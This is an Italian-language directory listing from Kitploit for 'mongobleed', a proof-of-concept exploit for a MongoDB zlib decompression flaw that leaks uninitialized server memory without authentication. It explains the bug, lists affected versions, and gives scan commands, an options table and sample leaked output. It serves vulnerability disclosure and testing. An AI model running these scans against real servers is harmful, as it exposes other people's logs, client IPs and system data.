Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mongobleed | Kitploit
Strumenti/GitHubGitHub/joe-desimone/mongobleed
Memory ForensicsAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubjoe-desimone/mongobleed

mongobleed

Vedi Repository
9431687 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

mongobleed

CVE-2025-14847 - Exploit di perdita di memoria non autenticata di MongoDB

Un exploit proof-of-concept per la vulnerabilità di decompressione zlib di MongoDB che consente a aggressori non autenticati di perdere memoria sensibile del server.

Vulnerabilità

Un difetto nella decompressione dei messaggi zlib di MongoDB restituisce la dimensione del buffer allocato invece della lunghezza effettiva dei dati decompressi. Ciò consente agli aggressori di leggere memoria non inizializzata tramite:

  1. Inviare un messaggio compresso con una dichiarazione uncompressedSize gonfiata
  2. MongoDB alloca un grande buffer basato sulla dichiarazione dell'aggressore
  3. zlib decompressa i dati effettivi all'inizio del buffer
  4. Il bug fa sì che MongoDB tratti l'intero buffer come dati validi
  5. Il parsing BSON legge i "nomi dei campi" dalla memoria non inizializzata fino ai byte nulli

Versioni Affette

VersioneVulnerabileCorretta
8.2.x8.2.0 - 8.2.28.2.3
8.0.x8.0.0 - 8.0.168.0.17
7.0.x7.0.0 - 7.0.277.0.28
6.0.x6.0.0 - 6.0.266.0.27
5.0.x5.0.0 - 5.0.315.0.32

Utilizzo

root@kitploit:~
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>

# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000

# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000

Opzioni

Esempio di Output

root@kitploit:~
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Author: Joe Desimone - x.com/dez_
[*] Target: localhost:27017
[*] Scanning offsets 20-50000

[+] offset=  117 len=  39: ssions^\u0001�r��*YDr���
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: Recv SyncookiesFailed EmbryonicRsts ...

[*] Total leaked: 8748 bytes
[*] Unique fragments: 42
[*] Saved to: leaked.bin

Ambiente di Test

Un file Docker Compose è incluso per avviare un'istanza MongoDB vulnerabile:

root@kitploit:~
docker-compose up -d
python3 mongobleed.py

Come Funziona

L'exploit crea documenti BSON con campi di lunghezza gonfiati. Quando il server analizza questi documenti, legge i nomi dei campi dalla memoria non inizializzata fino a incontrare un byte nullo. Ogni sondaggio a un offset diverso può perdere diverse regioni di memoria.

I dati persi possono includere:

  • Log interni e stato di MongoDB
  • Configurazione del motore di archiviazione WiredTiger
  • Dati di sistema /proc (meminfo, statistiche di rete)
  • Percorsi dei container Docker
  • UUID di connessione e IP dei client

Riferimenti

  • Avviso di sicurezza OX
  • Commit di correzione MongoDB

Autore

Joe Desimone - x.com/dez_

Dichiarazione di non responsabilità

Questo strumento è solo per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale.

Scarica lo strumento
OpzionePredefinitoDescrizione
--hostlocalhostHost MongoDB di destinazione
--port27017Porta MongoDB di destinazione
--min-offset20Lunghezza minima del documento da sondare
--max-offset8192Lunghezza massima del documento da sondare
--outputleaked.binFile di output per i dati persi